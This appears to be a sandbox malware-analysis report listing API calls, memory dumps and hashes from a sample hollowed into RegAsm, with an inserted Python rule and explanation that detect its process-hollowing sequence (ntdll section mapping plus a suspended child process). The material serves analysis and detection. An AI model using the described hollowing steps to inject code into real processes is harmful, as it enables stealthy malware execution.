                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModuleProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2905821283-0
                                                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                        • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                        • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                        APIs
                                                                        • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                        • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EventObjectSingleWaitsend
                                                                        • String ID:
                                                                        • API String ID: 3963590051-0
                                                                        • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                        • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                                        • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                        • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                        • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$HandleModule
                                                                        • String ID:
                                                                        • API String ID: 3519776433-0
                                                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                        • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                        • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                        • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                        • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                        • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                        • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                        • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                        • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                        • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                        • RegQueryValueExA.KERNEL32 ref: 00413587
                                                                        • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                                        • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                                        • RegCloseKey.KERNEL32(?), ref: 00413535
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                        • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                        • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                        • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                        • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID:
                                                                        • API String ID: 1818849710-0
                                                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                        • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                        • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                        APIs
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                          • Part of subcall function 004180EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                          • Part of subcall function 004180EF: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                        • CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                        • CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                        • String ID: t^F
                                                                        • API String ID: 2948481953-389975521
                                                                        • Opcode ID: 247fee8f8bf52748d850bc295b8f4d78ccc0daa5e201679a7bea01e83cf232d2
                                                                        • Instruction ID: f5f9b7b4b8a2ed15acd0e1e17f357bf619fd4f1f7ce3194d250e30b15390ff54
                                                                        • Opcode Fuzzy Hash: 247fee8f8bf52748d850bc295b8f4d78ccc0daa5e201679a7bea01e83cf232d2
                                                                        • Instruction Fuzzy Hash: E7D05E75C4120CFFCB006BA4EC0A8AEBB7CFB09201B4001AAFC2442253AB329818CA64
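The subcall chain listed for function 004180EF above is the classic process-hollowing shape: the sample resolves ZwCreateSection, ZwMapViewOfSection, ZwUnmapViewOfSection and ZwClose from ntdll by name, then calls CreateProcessW with dwCreationFlags 0x00000004 (CREATE_SUSPENDED) and VirtualAlloc, and the memory dump this function was taken from is a PE mapped at 0x00400000 inside RegAsm (the snapshot file name). The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: a small rule that parses API-call lines in the report's own listing format and flags that pattern. The sample listings are constructed to mirror the lines above, the CreateProcessW argument order is assumed to follow the Win32 prototype (dwCreationFlags is the sixth argument), and the reading of the extra GetModuleHandleA stack slots as the name later passed to GetProcAddress is an assumption about how the sandbox prints them.

```python
import re
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit, WinBase.h
SECTION_REMAP_APIS = {"ZwCreateSection", "ZwMapViewOfSection", "ZwUnmapViewOfSection"}

# One call record in the report's listing format, e.g.
#   "CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,...), ref: 00418217"
_CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)\((?P<args>[^)]*)\)\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
_NT_NAME_RE = re.compile(r"(?:Zw|Nt)[A-Z]\w+")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # stack slots as printed; "?" means the sandbox could not resolve the value
    ref: int     # address of the call site


def parse_calls(lines):
    """Extract every API-call record; lines without a parenthesised call are ignored."""
    calls = []
    for line in lines:
        m = _CALL_RE.search(line)
        if m:
            raw = m["args"].strip()
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m["api"], m["module"].upper(), args, int(m["ref"], 16)))
    return calls


def resolved_ntdll_exports(calls):
    """Names looked up in ntdll. Assumption: the listing prints stack slots beyond
    GetModuleHandleA's own argument, and the next slot is the export name that the
    following GetProcAddress call receives."""
    names = set()
    for c in calls:
        if c.api == "GetModuleHandleA" and c.args and c.args[0].lower() == "ntdll":
            names.update(a for a in c.args[1:] if _NT_NAME_RE.fullmatch(a))
    return names


def suspended_process_creations(calls):
    """Call sites of CreateProcessA/W whose dwCreationFlags (6th argument) has CREATE_SUSPENDED."""
    hits = []
    for c in calls:
        if c.api in ("CreateProcessA", "CreateProcessW") and len(c.args) >= 6:
            flags = c.args[5]
            if re.fullmatch(r"[0-9A-Fa-f]{1,8}", flags) and int(flags, 16) & CREATE_SUSPENDED:
                hits.append(c.ref)
    return hits


def assess(lines):
    """Combine the two indicators: a suspended child plus section (re)mapping
    primitives resolved from ntdll is the hollowing pattern; either alone is not."""
    calls = parse_calls(lines)
    exports = resolved_ntdll_exports(calls)
    suspended = suspended_process_creations(calls)
    remap = sorted(SECTION_REMAP_APIS & exports)
    verdict = ("process hollowing (section remap into suspended child)"
               if suspended and remap else "no hollowing pattern")
    return {
        "suspended_creates": suspended,
        "ntdll_exports": sorted(exports),
        "section_apis": remap,
        "verdict": verdict,
    }


# Constructed sample, modelled on the function 004180EF listing (not copied from a live run).
SAMPLE_LISTING = [
    "GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136",
    "GetProcAddress.KERNEL32(00000000), ref: 00418139",
    "GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A",
    "GetProcAddress.KERNEL32(00000000), ref: 0041814D",
    "GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E",
    "GetProcAddress.KERNEL32(00000000), ref: 00418161",
    "GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172",
    "CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217",
    "VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F",
    "CloseHandle.KERNEL32(004040F5), ref: 0041857E",
]

# Constructed benign control: a normal (non-suspended) child launch, no ntdll lookups.
BENIGN_LISTING = [
    "CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401000",
    "CloseHandle.KERNEL32(00000000), ref: 00401020",
]

if __name__ == "__main__":
    for name, listing in (("sample", SAMPLE_LISTING), ("benign", BENIGN_LISTING)):
        print(name, assess(listing))
```

The rule deliberately requires both halves of the pattern: a CREATE_SUSPENDED launch on its own is how debuggers and some installers start children, and section APIs on their own are used by loaders. Records without a parenthesised call (the `try_get_function.LIBVCRUNTIME ref:` and `_free.LIBCMT ref:` lines elsewhere in this listing) are skipped by the parser rather than mis-read.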
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-3916222277
                                                                        • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                        • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                                        • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                        • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-3916222277
                                                                        • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                        • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                        • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                        • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen
                                                                        • String ID: pQG
                                                                        • API String ID: 176396367-3769108836
                                                                        • Opcode ID: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                        • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                        • Opcode Fuzzy Hash: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                        • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: LCMapStringEx
                                                                        • API String ID: 2568140703-3893581201
                                                                        • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                                        • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: LCMapStringEx
                                                                        • API String ID: 2568140703-3893581201
                                                                        • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                        • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                        • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                        • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                                        Strings
                                                                        • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                        • String ID: InitializeCriticalSectionEx
                                                                        • API String ID: 2593887523-3084827643
                                                                        • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                        • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                                        • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                        • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Alloc
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2773662609-671089009
                                                                        • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                        • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                                        • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                        • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2773662609-671089009
                                                                        • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                        • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                        • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                        • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                        APIs
                                                                        • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: try_get_function
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2742660187-671089009
                                                                        • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                        • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                                        • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                        • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                                        APIs
                                                                        • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: try_get_function
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2742660187-671089009
                                                                        • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                        • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                        • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
